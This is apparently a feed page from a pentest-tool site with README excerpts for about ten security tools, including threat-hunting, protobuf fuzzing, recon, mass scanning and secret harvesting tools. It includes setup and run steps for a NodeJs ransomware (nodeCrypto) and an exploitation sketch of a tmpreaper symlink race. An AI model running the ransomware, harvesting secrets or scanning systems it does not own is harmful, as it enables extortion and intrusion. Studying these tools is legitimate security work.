Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

TheTHE - Simple, Shareable, Team-Focused And Expandable Threat Hunting Experience

$
0
0

TheTHE is an environment intended to help analysts and hunters over the early stages of their work in an easier, unified and quicker way. One of the major drawbacks when dealing with a hunting is the collection of information available on a high number of sources, both public and private.

All this information is usually scattered and sometimes even volatile. Perhaps at a certain point there is no information on a particular IOC (Indicator of Compromise), but that situation may change within a few hours and become crucial for the investigation. Based on our experience on Threat Hunting, we have created a free and open source framework to make the early stages of the investigation simpler from:

  • Server-client architecture. Investigation may be shared among your team.
  • APIkeys are stored in a database and may be shared by a team from a single point.
  • Results are cached; so not repeated API calls are used.
  • Better feeds your Threat Intelligence Platform. TheTHE allows to better perform a prior investigation of your assets.
  • Easy plugins: Whatever you need, it is easily embedded within the system.
  • Ideal for SOCs, CERTS or any team.
  • Automation of tasks and searches.
  • Rapid API processing of multiple tools.
  • Unification of information in a single interface, so that screenshots, spreadsheets, text files, etc. are not scattered.
  • Enrichment of collected data.
  • Periodic monitoring of a given IOC in case new information or related movements appear.

TheTHE has a web interface where the analyst starts its work by entering IOCs that will be sent to a backend, where the system will automatically look up for such resource on the various configured platforms in order to obtain unified information from different sources and access related reports or data existing on them. Furthermore, any change in the resources to be analyzed will be monitored. Everything is executed on a local system, without needing to share information with third parties until such information is not organized, linked, complete and synthesized. This allows that, in case the information must be analyzed later on any other platform (such as a Threat Intelligence Platform), it can be done in the most enriching possible manner.

A complete docker image is scheduled to be released soon, meanwhile you can play with the dev enviroment

Install (development enviroment)
  • git clone ...

Creating a Python virtual enviroment
  • pip install venv
  • python3 -m venv venv

Pull docker images
  • docker-compose build

Install node packages
  • cd frontend and npm install

Running (development enviroment)
Activate the Python virtual enviroment (from the project root):
source venv/bin/activate
You can open two terminal sessions (with both virtual enviroments activated) or just put the following two commands in background.
Backend:
watchmedo auto-restart -d tasks -p '*.py' -- celery -A tasks.tasks:celery_app worker -l info
gunicorn server.main:app --reload
Frontend (you won't be able to operate until a user is added to the system):
cd frontend
npm run serve

Setting up the initial account
You must open a session in the MongoDB (remember is a docker container):
docker exec -it thethe_mongo_1 /bin/bash
Create a collection (Mongodb) called "thethe" (of course, you MUST change docker-compose default passwords):
mongo -u MONGO_INITDB_ROOT_USERNAME -p MONGO_INITDB_ROOT_PASSWORD
Now, inside mongo shell:
use thethe
Create "users" and YOUR first user:
db.users.insert_one({"name": YOUR_NAME, "password": HASH})
hash is (assuming python env is activated and requirements.txt are installed) gotten from a python interactive interpreter:
from passlib.apps import custom_app_context as pwd_context
pwd_context.encrypt("yourpassword")
Copy the hash into the value of password field. Done.

How to create a plugin for THETHE
Plugins affect one or more resources. It may have a frontend counterpart written as a Vue (javascript) component. Plugins must registers itself to describe what they do, etc.
When the plugin is launched it may be queued in a Celery queue for background processing (or not, depending in the kind of tasks, actions, etc.)
A plugin does have the following structure:

Python plugin
A plugin in Python is just for describe the actions, description, name, category, etc. It must inherit from plugin_base/Plugin
The plugin MUST be located in server/plugins/ folder. Below is an exrtract of server/plugins/geoip.py
RESOURCE_TARGET = [ResourceType.IPv4]

# Plugin Metadata {a decription, if target is actively reached and name}
PLUGIN_DESCRIPTION = "Use a GeoIP service to geolocate an IP address"
PLUGIN_IS_ACTIVE = False
PLUGIN_NAME = "geoip"


class Plugin:
description = PLUGIN_DESCRIPTION
is_active = PLUGIN_IS_ACTIVE
name = PLUGIN_NAME

def __init__(self, resource, project_id):
self.project_id = project_id
self.resource = resource

def do(self):
resource_type = self.resource.get_type()

try:
to_task = {
"ip": self.resource.get_data()["address"],
"resource_id": self.resource.get_id_as_string(),
"project_id": self.project_id,
"resource_type": resource_type.value,
"plugin_name": Plugin.name,
}
geoip_task.delay(**to_task)

except Exception as e:
tb1 = traceback.TracebackException.from_exception(e)
print("".join(tb1.format()))

Celery task
Finally, the task is introduced as a Celery function which gives us async results. It SHOULD be located into tasks/tasks.py file with the proper Celery decorators
@celery_app.task
def geoip_task(plugin_name, project_id, resource_id, resource_type, ip):
try:
query_result = geoip(ip)
if not query_result:
return

# TODO: See if ResourceType.__str__ can be use for serialization
resource_type = ResourceType(resource_type)
resource = Resources.get(resource_id, resource_type)
resource.set_plugin_results(
plugin_name, project_id, resource_id, resource_type, query_result
)

except Exception as e:
tb1 = traceback.TracebackException.from_exception(e)
print("".join(tb1.format()))

Celery subtask
You MAY split the core functionality in a external module located into the tasks/subtasks folder.
def geoip(ip):
try:
URL = f"http://api.ipstack.com/{ip}?access_key={API_KEY}&format=1"
response = urllib.request.urlopen(URL).read()
return json.loads(response)

except Exception as e:
tb1 = traceback.TracebackException.from_exception(e)
print("".join(tb1.format()))
return None

Vue component
Finally, the frontend MIGHT know hot to represent the results as a view. As the system is designed to support dynamic load of plugins all the Vue components are loaded under demand via the DynamicComponent component.
Plugins must have an entry into the frontend/src/components/templates/<plugin name>/index.vue
Here you must deal with the plugins results presentation. As an example (taking GeoIp plugin):
<template>
<v-layout row pt-2 wrap class="subheading">
<v-flex lg5>
<v-flex>
<v-card>
<v-card-title primary-title>
<span class="subheading">Geolocalization</span>
</v-card-title>
<v-divider></v-divider>
<v-card-text>
<v-layout row>
<v-flex lg-6 class="text-xs-left">
<v-layout column>
<v-flex>
<v-label>Continent:</v-label>
</v-flex>
<v-flex>
<v-label>Country:</v-label>
</v-flex>
<v-flex>
<v-label>Region:</v-label>
</v-flex>
<v -flex>
<v-label>City:</v-label>
</v-flex>
<v-flex>
<v-label>Zip:</v-label>
</v-flex>
<v-flex>
<v-label>Latitude:</v-label>
</v-flex>
<v-flex>
<v-label>Longitude:</v-label>
</v-flex>
<v-flex v-if="resource.country_code">
<v-label>Flag:</v-label>
</v-flex>
</v-layout>
</v-flex>
<v-flex lg-6 class="text-xs-right">
<v-layout column>
<v-flex>{{ resource.continent_name }}</v-flex>
<v-flex>{{ resource.co untry_name }}</v-flex>
<v-flex>{{ resource.region_name }}</v-flex>
<v-flex>{{ resource.city }}</v-flex>
<v-flex>{{ resource.zip }}</v-flex>
<v-flex>{{ resource.latitude }}</v-flex>
<v-flex>{{ resource.longitude }}</v-flex>
<v-flex v-if="resource.country_code">
<country-flag :country="resource.country_code"></country-flag>
</v-flex>
</v-layout>
</v-flex>
</v-layout>
</v-card-text>
</v-card>
</v-flex>
</v-flex>
</v-layout>
</template>

<script>
import { make_unique_list } from "../../../utils/utils";

export default {
name: "geoip" ,
props: {
plugin_results: Object
},
data: function() {
return {};
},
computed: {
resource: function() {
let plugin_result = { ...this.plugin_results };
return plugin_result;
}
}
};
</script>



Pbtk - A Toolset For Reverse Engineering And Fuzzing Protobuf-based Apps

$
0
0

Protobuf is a serialization format developed by Google and used in an increasing number of Android, web, desktop and more applications. It consists of a language for declaring data structures, which is then compiled to code or another kind of structure depending on the target implementation.
pbtk (Protobuf toolkit) is a full-fledged set of scripts, accessible through an unified GUI, that provides two main features:
  • Extracting Protobuf structures from programs, converting them back into readable .protos, supporting various implementations:
    • All the main Java runtimes (base, Lite, Nano, Micro, J2ME), with full Proguard support,
    • Binaries containing embedded reflection metadata (typically C++, sometimes Java and most other bindings),
    • Web applications using the JsProtoUrl runtime.
  • Editing, replaying and fuzzing data sent to Protobuf network endpoints, through a handy graphical interface that allows you to edit live the fields for a Protobuf message and view the result. 

Installation
PBTK requires Python ≥ 3.5, PyQt 5, Python-Protobuf 3, and a handful of executable programs (chromium, jad, dex2jar...) for running extractor scripts.
Archlinux users can install directly through the package:
$ yaourt -S pbtk-git
$ pbtk
On most other distributions, you'll want to run it directly:
# For Ubuntu/Debian testing derivates:
$ sudo apt install python3-pip git openjdk-9-jre

$ sudo pip3 install protobuf pyqt5 requests websocket-client

$ git clone https://github.com/marin-m/pbtk
$ cd pbtk
$ ./gui.py
Windows is also supported (with the same modules required). Once you run the GUI, it should warn you on what you are missing depending on what you try to do.

Command line usage
The GUI can be lanched through the main script:
./gui.py
The following scripts can also be used standalone, without a GUI:
./extractors/jar_extract.py [-h] input_file [output_dir]
./extractors/from_binary.py [-h] input_file [output_dir]
./extractors/web_extract.py [-h] input_url [output_dir]

Typical workflow
Let's say you're reverse engineering an Android application. You explored a bit the application with your favorite decompiler, and figured it transports Protobuf as POST data over HTTPS in a typical way.
You open PBTK and are greeted in a meaningful manner:


The first step is getting your .protos into text format. If you're targeting an Android app, dropping in an APK and waiting should do the magic work! (unless it's a really exotic implementation)


This being done, you jump to ~/.pbtk/protos/<your APK name> (either through the command line, or the button on the bottom of the welcome screen to open your file browser, the way you prefer). All the app's .protos are indeed here.
Back in your decompiler, you stumbled upon the class that constructs data sent to the HTTPS endpoint that interests you. It serializes the Protobuf message by calling a class made of generated code.


This latter class should have a perfect match inside your .protos directory (i.e com.foo.bar.a.b will match com/foo/bar/a/b.proto). Either way, grepping its name should enable you to reference it.
That's great: the next thing is going to Step 2, selecting your desired input .proto, and filling some information about your endpoint.


You may also give some sample raw Protobuf data, that was sent to this endpoint, captured through mitmproxy or Wireshark, and that you'll paste in a hex-encoded form.
Step 3 is about the fun part of clicking buttons and seeing what happens! You have a tree view representing every field in the Protobuf structure (repeated fields are suffixed by "+", required fields don't have checkboxes).


Just hover a field to have focus. If the field is an integer type, use the mouse wheel to increment/decrement it. Enum information appears on hover too.
Here it is! You can determine the meaning of every field with that. If you extracted .protos out of minified code, you can rename fields according to what you notice they mean, by clicking their names.
Happy reversing!

Local data storage
PBTK stores extracted .proto information into ~/.pbtk/protos/ (or %APPDATA%\pbtk\protos on Windows).
You can move in, move out, rename, edit or erase data from this directory directly through your regular file browser and text editor, it's the expected way to do it and won't interfere with PBTK.
HTTP-based endpoints are stored into ~/.pbtk/endpoints/ as JSON objects. These objects are arrays of pairs of request/response information, which looks like this:
[{
"request": {
"transport": "pburl",
"proto": "www.google.com/VectorTown.proto",
"url": "https://www.google.com/VectorTown",
"pb_param": "pb",
"samples": [{
"pb": "!....",
"hl": "fr"
}]
},
"response": {
"format": "other"
}
}]

Source code structure
PBTK uses two kinds of pluggable modules internally: extractors, and transports.
  • An extractor supports extracting .proto structures from a target Protobuf implementation or platform.
Extractors are defined in extractors/*.py. They are defined as a method preceded by a decorator, like this:
@register_extractor(name = 'my_extractor',
desc = 'Extract Protobuf structures from Foobar code (*.foo, *.bar)',
depends={'binaries': ['foobar-decompiler']})
def my_extractor(path):
# Load contents of the `path` input file and do your stuff...

# Then, yield extracted .protos using a generator:
for i in do_your_extraction_work():
yield proto_name + '.proto', proto_contents

# Other kinds of information can be yield, such as endpoint information or progress to display.
  • A transport supports a way of deserializing, reserializing and sending Protobuf data over the network. For example, the most commonly used transport is raw POST data over HTTP.
Transports are defined in utils/transports.py. They are defined as a class preceded by a decorator, like this:
@register_transport(
name = 'my_transport',
desc = 'Protobuf as raw POST data',
ui_data_form = 'hex strings'
)
class MyTransport():
def __init__(self, pb_param, url):
self.url = url

def serialize_sample(self, sample):
# We got a sample of input data from the user.
# Verify that it is valid in the form described through "ui_data_form" parameter, fail with an exception or return False otherwise.
# Optionally modify this data prior to returning it.
bytes.fromhex(sample)
return sample

def load_sample(self, sample, pb_msg):
# Parse input data into the provided Protobuf object.
pb_msg.ParseFromString(bytes.fromhex(sample))

def perform_request(self, pb_data, tab_data):
# Perform a request using the provided URL and Protobuf object, and optionally other transport-specific side dat a.
return post(url, pb_data.SerializeToString(), headers=USER_AGENT)


nodeCrypto v2.0 - Ransomware Written In NodeJs

$
0
0

nodeCrypt is a linuxRansomware written in NodeJs that encrypt predefined files.
This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.

Demo video

ggggggggggggggggggggggggggggggg 

Install server
Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.

Install and run
git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto&& npm install
cd sources && npm install
cd .. && npm start
Once your configuration is complete, run compile!
You can start the ransomware.
cd sources && ./output
The files at the root of the web server will encrypt and send to the server.

Screenshot




ReconCobra - Complete Automated Pentest Framework For Information Gathering

$
0
0

ReconCobra
  • Reconcobra is Foot printing software for Ultimate Information Gathering
  • Kali, Parrot OS, Black Arch, Termux, Android Led TV

Interface
  • Software have 82 Options with full automation with powerful information gathering capability

In-Action








Brief Introduction
  • ReconCobra is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.
  • It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.
  • With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.
  • ReconCobra software can audit, firewall behaviour, if it is leaking backend machines/server and replying pings, it can find internal and external networks where many software’s like erp, mail firewalls are installed, exposing servers so it do Footprinting, Scanning & Enumeration as much as possible of target, to discover and collect most possible informations like username, web technologies, files, endpoint, api and much more.
  • It’s first step to stop cyber criminals by securing your Infrastructural Information Gathering leakage. ReconCobra is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.

University Course
  • ReconCobra is now a part of International Hacking Trainings for OSINT
  • Cybersecurity365.com OSINT for Reconnaissance trainings for CEH, CISSP, Security+, ITPA

Integrations
  • Tigerman Root Software Package

Youtube Video

Kali Installation
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • sudo chmod u+x *.sh
  • ./Kali_Installer.sh
  • ReconCobra will integrate as system software
  • Dependencies will be handled automatically
  • Third party software(s)/dependencies/modules will be handled automatically

Parrot OS Installation
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • Bash ParrotOS_Installer.sh
  • ReconCobra will integrate as system software
  • Dependencies will be handled automatically
  • Third party software(s)/dependencies/modules will be handled automatically

Termux Installation
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • pkg install proot
  • type: termux-chroot
  • ./Termux_Installer.sh
  • ./Termux_fixme.sh
  • Reboot your Termux
  • perl ReconCobraTermux.pl
  • Dependencies will be handled automatically for Termux
  • Third party software(s)/dependencies/modules will be handled automatically for Termux

Android Led TV Installation
  • Install termux
  • Input usb keyboard
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • pkg install proot
  • type: termux-chroot
  • ./Termux_Installer.sh
  • ./Termux_fixme.sh
  • Reboot your Termux
  • perl ReconCobraTermux.pl
  • Dependencies will be handled automatically for Termux
  • Third party software(s)/dependencies/modules will be handled automatically for Termux

Black Arch Installation
  • Open issue, if error occur
  • git clone https://github.com/haroonawanofficial/ReconCobra.git
  • cd Reconcobra
  • chmod u+x *.sh
  • ./BlackArch_Installer.sh
  • ReconCobra will integrate as system software
  • Dependencies will be handled automatically
  • Third party software(s)/dependencies/modules will be handled automatically

Developer

Co-developer & Senior Tester
  • Arun S


    Secretx - Extracting API Keys And Secrets By Requesting Each URL At The Your List

    $
    0
    0

    Extracting api keys and secrets by requesting each url at the your list.

    Installation
    python3 -m pip install -r requirements.txt

    Usage
    python3 secretx.py --list urlList.txt --threads 15

    optional arguments: --help --colorless

    Credits
    Thanks to @m4ll0k for patterns and @choudhary_1337 inpsiring for that idea.


    Silver - Mass Scan IPs For Vulnerable Services

    $
    0
    0

    masscan is fast, nmap can fingerprint software and vulners is a huge vulnerability database. Silver is a front-end that allows complete utilization of these programs by parsing data, spawning parallel processes, caching vulnerability data for faster scanning over time and much more.
    Note: Silver isn't compatible with Python 2.

    Features
    • Resumable scanning
    • Slack notifcations
    • multi-core utilization
    • Vulnerability data caching
    • Smart Shodan integration*
    *Shodan integration is optional but when linked, Silver can automatically use Shodan to retrieve service and vulnerability data if a host has a lot of ports open to save resources. Shodan credits used per scan by Silver can be throttled. The minimum number of ports to trigger Shodan can be configured as well.

    Requirements

    Usage
    Note: Silver scans all TCP ports by default i.e. ports 0-65535.

    Scan host(s) from command line
    python3 silver.py 127.0.0.1
    python3 silver.py 127.0.0.1/22
    python3 silver.py 127.0.0.1,127.0.0.2,127.0.0.3

    Scan top ~1000 ports
    python3 silver.py 127.0.0.1 --quick

    Scan hosts from a file
    python3 silver.py -i /path/to/targets.txt

    Set max number of parallel nmap instances
    python3 silver.py -i /path/to/targets.txt -t 4

    Configuration
    Slack WebHook, Shodan API key and limits can be configured by editing respective variables in /core/memory.py

    Setting up Slack notifications
    • Create a workspace on slack, here
    • Create an app, here
    • Enable WebHooks from the app and copy the URL from there to Silver's /core/memory.py file.

    Automatic API Attack Tool - Customizable API Attack Tool Takes An API Specification As An Input, Generates And Runs Attacks That Are Based On It As An Output

    $
    0
    0

    Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output.
    The tool is able to parse an API specification and create fuzzing attack scenarios based on what is defined in the API specification. Each endpoint is injected with cleverly generated values within the boundaries defined by the specification, and outside of it, the appropriate requests are sent and their success or failure are reported in a detailed manner. You may also extend it to run various security attack vectors, such as illegal resource access, XSS, SQLi and RFI, that are targeted at the existing endpoints, or even at non-existing ones. No human intervention is needed. Simply run the tool and get the results.
    The tool can be easily extended to adapt to meet the various needs, such as for a developer who wants to test their API, or an organization that wants to run regular vulnerability or positive security scans on its public API. It is built with CI/CD in mind.

    Requirements
    • Java 8 or higher
    • Gradle

    Running
    • Check out the code from GitHub and run 'gradle build'
    • You may find the executable jar under the build/libs folder
    • Run 'java -jar imperva-api-attack-tool.jar' to see the help menu

    Making a Linux executable
    • Copy the runnable.sh file from the src/main/resources folder, to the same directory with the jar file.
    • Now run: 'cat runnable.sh imperva-api-attack-tool.jar > api-attack.sh && chmod +x api-attack.sh'
    • You may use the api-attack.sh file as a regular executable

    Usage

    Required parameters:
    -f, --specFile=specFilePath
    The API specification file (swagger 2.0) to run on. JSON/YAML format. For better results, make sure responses are well defined for each endpoint.
    -n, --hostName=hostName
    The host name to connect to. It can also be an IP
    -s, --hostScheme=hostScheme
    Connection to host will be made using this scheme; e.g: https or http

    Optional parameters:
    -p, --hostPort=hostPort
    The port the host is listening on for API calls, default is: 443
    -ph, --proxyHost=proxyHost
    Specify the proxy host to send the requests via a proxy
    -pp, --proxyPort=proxyPort
    The proxy port, default is: 80
    -rcn, --addNegativeRC=responseCode[,responseCode...]
    Additional response codes to be accepted in negative attacks (e.g. bad value attacks). Multiple values are supported, separated by commas
    -rcp, --addPositiveRC=responseCode[,responseCode...]
    Additional response codes to be accepted in positive checks (legitimate value attacks). Multiple values are supported, separated by commas


    Typical usage scenarios:
    • You'd like to check whether your API is protected by an API Security solution.
      Example run: api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -rcn=403
      We've added the 403 response code as a legitimate response code for the negative checks. This is since the API Security solution blocks such requests, and returns a 403 status. The spec, on the other hand, doesn't necessarily define such a response with HTTP code of 403, for any of its endpoints. This would make such responses legitimate, in spite of them not being in the spec, and alert you when such a response is not received from a negative check. Such cases mean that you are left unprotected by your API security solution.
    • You'd like to check how your proxy mitigates API attacks, but don't have an actual site behind it.
      Example run: api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -ph 127.0.0.1 -pp=4010 -rcn=403 -rcp=404
      This time we've added the 404 status code to the positive scenarios. So that when a scenario is not being blocked, we will not report a failure, but rather accept the legitimate 404 (resource not found) response.
    • You'd like to check whether your API handles all inputs correctly. Furthermore, you'd like to run it on a nightly basis, or even after each time a developer pushes new code to the project.
      Example run: api-attack.sh -f myapi_swagger.yaml -n staging.myorg.com -s https
      This time we're running without any exclusions. The API specification file must declare its response codes precisely. The tool will accept only them as legitimate, and will fail the checks otherwise. See more below on conditions of failing the checks. Run the above command in a Jenkins job (or any other CI/CD software to your liking), which will be triggered by a cron, or a repo code push activity. Make sure you have the TestNG plugin installed, which should parse the results written in build/testng-results, for better visibility in the CI/CD scenario.
    • You'd like to check whether this API might be open to fuzzing attempts. Simply run the tool and check the reported failures.
      Example run: api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https
    • You'd like to check whether your API is implemented correctly on the server side, or that its definition corresponds the server implementation.
      Example run: api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https

    Conditions for failing checks
    • The tool verifies the generated request response code matches the declared response codes in the swagger. Yet,
    • Positive checks: if it's a clear error (code is 5xx), we will still fail the check, even if this response code is not defined in the spec, but not if you supplied an override.
    • Negative checks: if the response is not a legitimate error (1xx, 2xx, 5xx), we fail the check unless you supplied an override. If the legitimate error code is not in the spec, the check will fail as well.
    • You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.

    Conditions for failing checks
    • The tool verifies the generated request response code matches the declared response codes in the swagger. Yet,
    • Positive checks: if it's a clear error (code is 5xx), we will still fail the check, even if this response code is not defined in the spec, but not if you supplied an override.
    • Negative checks: if the response is not a legitimate error (1xx, 2xx, 5xx), we fail the check. Unless you supplied an override. If the legitimate error code is not in the spec, the check will fail as well.
    • You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.

    Expected outputs:
    • The tool uses the testng reporting framework, so any plugin that handles testng runs can be used here. Only note that the results are written under the build/testng-results folder. This can be changed, of course.
    • The tool generates requests according to its check suites, and each request checks something specific. So each check will present all the relevant details in the command line output, together with what is being checked, what the response is, and whether or not it was as expected.
    • Any bad requests will be stored in the bad_requests folder, so that you could analyze it later (e.g. if this is running on CI/CD server, for instance, and you don't have immediate access to the machine)
    • In the end, you will be provided with a summary

    Example of a negative check that failed:
    ***** Testing API Endpoint *****
    ***** Test ID: 1575128763286-74212
    Testing: Bad Property: /username (STRING), value: {, URL encoded: %7B
    --> Url: /user/{
    --> Method: GET
    --> Headers: []
    ----------**----------
    Request was: GET /user/{ [Accept: application/json], Response status code: 200(UNEXPECTED)
    Response (non parsed):
    {"id":0,"username":"string","firstName":"string","lastName":"string","email":"string","password":"string","phone":"string","userStatus":0}
    Why did the check fail? The request got 200, even though didn't contain a legal URL

    Another example:
    ***** Testing API Endpoint *****
    ***** Test ID: 1575128763286-25078
    Testing: Bad Property: /body/quantity (INTEGER), value: 0.4188493, URL encoded: 0.4188493
    --> Url: /store/order
    --> Method: POST
    --> Headers: []
    --> Body: {"petId":-2511515111206893939,"quantity":0.4188493,"id":698757161286106823,"shipDate":"�s","complete":"true","status":"approved"}
    ----------**----------
    Request was: POST /store/order [Accept: application/json], Response status code: 200(UNEXPECTED)
    Response (non parsed):
    {"id":0,"petId":0,"quantity":0,"shipDate":"2019-11-30T15:46:03Z","status":"placed","complete":false}
    The server expected to get an integer, but accepted a double value. This might be a good spot to try and exploit some buffer overflow in the server.

    Example of a successful check:
    ***** Testing API Endpoint *****
    ***** Test ID: 1575128763137-43035
    Testing: /user/{username}
    --> Url: /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+(
    --> Method: GET
    --> Headers: []
    ----------**----------
    Request was: GET /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+( [Accept: application/json], Response status code: 404
    Response (non parsed):
    {"statusCode":404,"error":"Not Found","message":"Not Found"}
    We supplied a username that was nonexistent but legal, according to the API specification. The server knew how to handle this request and return a legal error.

    Supported Check Scenarios
    We will use the term endpoint here, as the endpoint URL and Method tuple.

    Positive Scenarios
    • For each endpoint, creates a request with generated values for all of its parameters. These are generated randomly, but obey the rules that are defined in the API specification.
    • For each endpoint, creates a request with only the required parameters, with values generated as described above.

    Negative Scenarios
    • For each endpoint, creates multiple requests, each which checks a different parameter. The tool does this by injecting a random bad input value in the checked parameter, and filling the rest with "positive" values which are generated in the same manner as described in the positive scenarios.

    Ongoing Effort
    We are working on migrating our other scenarios to the open-source tool, for the benefit of the community. Stay tuned for updates.

    Extensibility
    The tool is written in a way that makes it easy to extend its fuzzing and request generation functionality to meet your specific needs. Feel free to suggest any additions that others may benefit from by creating a pull request.


    PathAuditor - Detecting Unsafe Path Access Patterns

    $
    0
    0

    The PathAuditor is a tool meant to find file access related vulnerabilities by auditing libc functions.
    The idea is roughly as follows:
    • Audit every call to filesystem related libc functions performed by the binary.
    • Check if the path used in the syscall is user-writable. In this case an unprivileged user could have replaced a directory or file with a symlink.
    • Log all violations as potential vulnerabilities.
    We're using LD_PRELOAD to hook all filesystem related library calls and log any encountered violations to syslog.
    This is not an officially supported Google product.

    Example Vulnerability
    Let's look at an example of the kind of vulnerability that this tool can detect. CVE-2019-3461 was a bug in tmpreaper, a tool that traverses /tmp and deletes old files. It's usually run as a cron job as root. Since it doesn't want to delete files outside of tmp, it was using the following code to check if a directory is a mount point:
    if (S_ISDIR (sb.st_mode)) {
    char *dst;

    if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
    message (LOG_FATAL, "malloc failed.\n");
    strcpy(dst, ent->d_name);
    strcat(dst, "/X");
    rename(ent->d_name, dst);
    if (errno == EXDEV) {
    free(dst);
    message (LOG_VERBOSE,
    "File on different device skipped: `%s/%s'\n",
    dirname, ent->d_name);
    continue;
    }
    // [...]
    In short, this code calls rename("/tmp/foo", "/tmp/foo/x") which will return EXDEV if "/tmp/foo" is a mount point. PathAuditor would flag this call as a potential vulnerability if "/tmp/foo" is owned by any user except root. To understand why, we have to think about what happens in the kernel when the rename syscall is executed (simplified):
    1. The kernel traverses the path "/tmp/foo" for the first argument.
    2. The kernel traverses the path "/tmp/foo/x" for the second argument.
    3. If the source and target are on different filesystems, return EXDEV.
    4. Otherwise, move the file from the first to the second directory.
    There's a race condition here since "/tmp/foo" will be resolved twice. If it's user-controlled, the user can replace it with a different file at any point in time. In particular, we want "/tmp/foo" to be a directory at first to pass the if(S_ISDIR) check in the tmpreaper code. We then replace it with a file just before the code enters the syscall. When the kernel resolves the first argument, it will see a file with user-controlled content. Now we replace it again, this time with a symlink to an arbitrary directory on the same filesystem. The kernel will resolve the path a second time, follow the symlink and move the controlled file to a chosen directory.
    The same filesystem restriction is because rename does not work between filesystems. But on some Linux distributions /tmp is just a folder on the rootfs by default and you could use this bug to move a file to /etc/cron, which will get executed as root.

    How to run
    To try it out, you need to build libpath_auditor.so with bazel and load it into a binary using LD_PRELOAD. Any violations will be logged to syslog, so make sure that you have it running.
    bazel build //pathauditor/libc:libpath_auditor.so
    LD_PRELOAD=/path/to/bazel-bin/pathauditor/libc/libpath_auditor.so cat /tmp/foo/bar
    tail /var/log/syslog
    It's also possible to run this on all processes on the system by adding it to /etc/ld.so.preload. Though be warned that this is only recommended on test systems as it can lead to instability.
    As a quickstart, you can try out the docker container shipped with this project:
    docker build -t pathauditor-example .
    docker run -it pathauditor-example
    # LD_PRELOAD=/pathauditor/bazel-bin/pathauditor/libc/libpath_auditor.so cat /tmp/foo/bar
    # cat /var/log/syslog



    Lazyrecon - Script To Automate Your Reconnaissance Process In An Organized Fashion

    $
    0
    0

    LazyRecon is a script written in Bash, it is intended to automate some tedious tasks of reconnaissance and information gathering. This tool allows you to gather some information that should help you identify what to do next and where to look.

    Usage
    ./lazyrecon.sh -d target.com

    Main Features
    • Create a dated folder with recon notes
    • Grab subdomains using:
      * Sublist3r, certspotter and cert.sh
      * Dns bruteforcing using massdns
    • Find any CNAME records pointing to unused cloud services like aws
    • Probe for live hosts over ports 80/443
    • Grab a screenshots of responsive hosts
    • Scrape wayback for data:
      * Extract javascript files
      * Build custom parameter wordlist, ready to be loaded later into Burp intruder or any other tool
      * Extract any urls with .jsp, .php or .aspx and store them for further inspection
    • Perform nmap on specific ports
    • Get dns information about every subdomain
    • Perform dirsearch for all subdomains
    • Generate a HTML report with output from the tools above
    • Improved reporting and less output while doing the work
    • Dark mode for html reports

    New features
    • Directory search module is now MULTITHREADED (up to 10 subdomains scanned at a time)
    • Enhanced html reports with the ability to search for strings, endpoints, reponse sizes or status codes

    DEMO



    Installation & Requirements

    System Requirements
    • Recommended to run on vps with 1VCPU and 2GB ram.

    Authors and Thanks
    This script makes use of tools developped by the following people

    TO DO
    • Report only mode to generate reports for old dirsearch data
    • SubDomain exclusion
    Warning: This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.


    Findomain v0.9.3 - The Fastest And Cross-Platform Subdomain Enumerator

    $
    0
    0

    The fastest and cross-platform subdomain enumerator.

    What Findomain can do?
    It table gives you a idea why you should use findomain and what it can do for you. The domain used for the test was aol.com in the following BlackArch virtual machine:
    Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
    Kernel: 5.2.6-arch1-1-ARCH
    CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
    Memory: 139MiB / 3943MiB
    The tool used to calculate the time, is the time command in Linux.
    Enumeration ToolSearch TimeTotal Subdomains FoundCPU UsageRAM Usage
    Findomainreal 0m5.515s84110Very LowVery Low
    Summary: 84110 subdomains in 5.5 seconds.

    Features
    • Subdomains monitoring: put data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
    • Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 20 seconds.
    • Parallel support for subdomains resolution, in good network conditions can resolv about 2000 subdomains per minute.
    • DNS over TLS support.
    • Specific IPv4 or IPv6 query support.
    • Discover subdomains without brute-force, it tool uses Certificate Transparency Logs and APIs.
    • Discover only resolved subdomains.
    • Discover subdomains IP for data analisis.
    • Read target from user argument (-t) or file (-f).
    • Write to one unique output file specified by the user all or only resolved subdomains.
    • Write results to automatically named TXT output file(s).
    • Hability to query directly the Findomain database created with Subdomains Monitoring for previous discovered subdomains.
    • Hability to import and work data discovered by other tools.
    • Quiet mode to run it silently.
    • Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.
    • Multiple API support.

    Findomain in depth
